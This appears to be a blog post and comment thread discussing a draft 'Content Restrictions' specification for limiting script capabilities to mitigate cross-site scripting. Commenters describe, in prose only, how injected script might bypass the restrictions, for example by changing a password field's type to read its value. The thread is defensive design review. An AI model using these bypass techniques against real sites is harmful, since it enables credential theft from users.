Currently, the only defence against Cross-Site Scripting (XSS) attacks is server-side filtering of untrusted content. If that fails, the user agent is wide open. In absence of any information from the site designer, the user agent cannot make decisions about what script in the page to execute and what not to execute – it has to execute it all.
So, the perfect way to prevent XSS attacks would be for the user agent to read the website designer’s mind to determine which scripts embedded in a page were legitimate and which were malicious. In the absence of affordable and reliable mind-reading technology, and in consideration of the mental fatigue this would undoubtedly induce in web page authors, my new paper, “Content Restrictions“, presents the draft specification of a way for a site designer to explain his state of mind to the user agent by specifying restrictions on the capabilities of his content.
I hope to turn this into a draft RFC soon, so any comments would be extremely welcome.
I think the DOM is so flexible that it can circumvent several restrictions. Some examples:
The ‘create’ restrictions do not neccessarily make things any safer. If we take eBay, for example, a malicious user could type in any number of HTML elements with ID attributes inside a hidden div, along with a script that moves the elements via DOM to their desired places – no need to create elements, but still “complete page transformation”.
‘request=nopost’ does not protect “dangerous operations” – it would be very easy to change the form’s method attribute value to GET before submitting. Therefore, if the server-side app does not differentiate between GET and POST parameters (and some scripting languages do not, by default), any script could still auto-trigger actions.
Similarly, a ‘forms=nopassword’ clause will be useless if it does not prevent scripts from manipulating the input element via DOM – for example, set its type attribute to “text” (or remove it altogether), read out the password, and change it back.
Oh, and having a domain-restriction on request targets won’t help the mass of sites that have a redirect? CGI script (e.g. to de-refer external links) on their site (they could move this script to another domain though).
The above examples are not neccessarily flaws in the spec, but the issues should at least be named to not lead web page makers into a false sense of security. (btw: they crossed my mind after the first read of the spec; one might conclude that other people find more “workarounds” over time; not counting testing any potential flaws in implementations of the spec)
Perhaps the most secure way would be to just include script=none as a restriction. However, as the original web site author might need his own JavaScript snippets on the pages, it would be nice to be able to designate “script-free areas” within the page. Thinking of eBay again, this might be used to tell the user agent: do not execute any <script> elements or onXXX event handlers within the element with ID=zzz and below (where the untrusted user-supplied content is inserted).
Another idea may be to specify the restrictions on elements using an attribute, e.g. <div script=”none”></div>. This would allow different policies for different parts of the page, and it may even reduce the need for so many restriction types.
Perhaps this is an idea for the WHATWG.
Instead of a simple ‘create’ restriction, what about a broader one that could include creating, moving, removing, or editing attributes etc.
Check out http://www.shocking.com/~rsnake/xss.html for all the evasion techniques. I like Christian’s idea personally. Any way to restrict the page is good, although now you just have to make sure the bad guys can’t close the div tag inappropriately.
Jason: all the techniques on the page you give are irrelevant, as they are about sneaking script past server-side filters. This proposal is about limiting the capabilities of script once it’s running.
Gerv, I remember reading a proposal very much like yours (actually Christan’s) on www-talk (IIRC) a few years ago. It got shot down quickly saying that it’s server-side business to filter bad stuff out their pages.
As far as I understand, your proporsal applies to the whole document. If a site wanted to do that, it could just serve that untrusted content from a different host (different hosts are like different domains to us, unless overridden by pages) and you have almost the same effect.
That’s uninteresting in most cases, because the most common and dangerous case is when content is mixed on the same page. The dead-stupid ebay, webmail, forums etc. all are like this (they don’t use frames for other good reasons).
This hints at how different uses have different needs, which hints that it’s better to do it solely server-side. I’m not saving that it’s a bad idea, though.
But I really don’t want to have holes in the implementation or spec to be counted as “security holes” of the browser :).
Christian: Another idea may be to specify the restrictions on elements using an attribute, e.g. <div script=”none”></div> . This would allow different policies for different parts of the page, and it may even reduce the need for so many restriction types.
My biggest problem with this is that it mixes behavior with content. Ideally we should be able to craft something that doesn’t leave the recesses of the or http header. Mabye we could have the restriction header point to a file with a similar format to CSS selectors or XPath or something. (i.e. use div{script:none} instead).
Gerv: what useful operations would be still possible if you restricted script that much?
Sorry, I didn’t make my self clear. I was thinking that these would be disabled/inabled individually (i.e. *{create:none; move:all; editattributes:none; etc.})
Also regarding the create restriction I think it should be devided by types of Nodes (elements, text, and mabye more) an elements that have an refer to external resource (<img>,<frame>,<iframe>,etc.)
Another thing I noticed. With the ‘forms’ restriction what exactly do the values mean?
I assume ‘none’ means to remove all form controls
‘read’ means to set them all to readonly=’readonly’
‘write’ would that mean something like the form controls are still there but all invisible? Should just the content be invisible, or something like setting all <input type=’text’> to <input type=’password>?
‘nopassword’ same problem as ‘write’
Ben:
I think we now have fairly clear evidence that this attitude just doesn’t cut it. :-)
For most of the proposed restrictions, the effect is very different. It’s roughly the same for the very limited case of restricting read and write access to cookies, but that’s only a tiny part of the proposal. How do you say “only allow script in the head to run” using an external host? Or “only allow read access to form control values”?
Also, many people don’t have access to a different host.
There are several parts of the proposal which are addressed towards this scenario. For example, if the legit code didn’t need to access cookies, you could set cookies=none and then any injected code couldn’t access them either. If the legit code was all in the head, set script=head and any injection into the body is useless. Etc. etc.
They can’t. That’s another advantage of a “restrictions” model. If there’s a hole in our implementation of the “forms” keyword, then it’s just as if we don’t support that one yet. Which is fine, and allowed. It just means some attacks which might be prevented aren’t – but then, in a user agent which didn’t support Content-Restrictions at all, they wouldn’t be prevented either.
Alan: you’ve got the wrong end of the stick about the “forms” thing a bit. None doesn’t mean “remove all form controls”, it means “you can’t access any form controls via script”. Similarly, “read” means “you can read their values, but not write them”, and “write” means the opposite.